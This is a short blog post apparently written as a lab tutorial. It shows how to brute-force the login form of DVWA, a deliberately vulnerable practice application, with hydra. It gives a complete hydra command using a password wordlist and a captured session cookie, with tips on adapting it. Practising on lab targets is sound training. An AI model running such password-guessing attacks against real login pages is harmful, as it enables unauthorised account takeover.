Monday, September 14, 2015

DVWA brute force login with hydra

hydra <IP-Address> -l admin -P /root/scripts/recon_enum/wordlists/passlist http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=5b1c46ae203ccb0dcbf8fc3390e276d2"
Replace <IP-Address> with the target's IP address.

The username is "-l admin". Replace the username as necessary, and if you're using a user list, change the parameter to "-L /path/to/userlist.txt".

Change the PHPSESSID to one you capture with Wireshark, Burp, ZAP, etc when you manually enter a login/password.

Notice the while the request url has is typically "/dvwa/vulnerabilities/brute/?username=user&password=pass&Login=Login", in hydra you need to specify "index.php" between "/brute/" and the "?", and you replace the "?" with ":".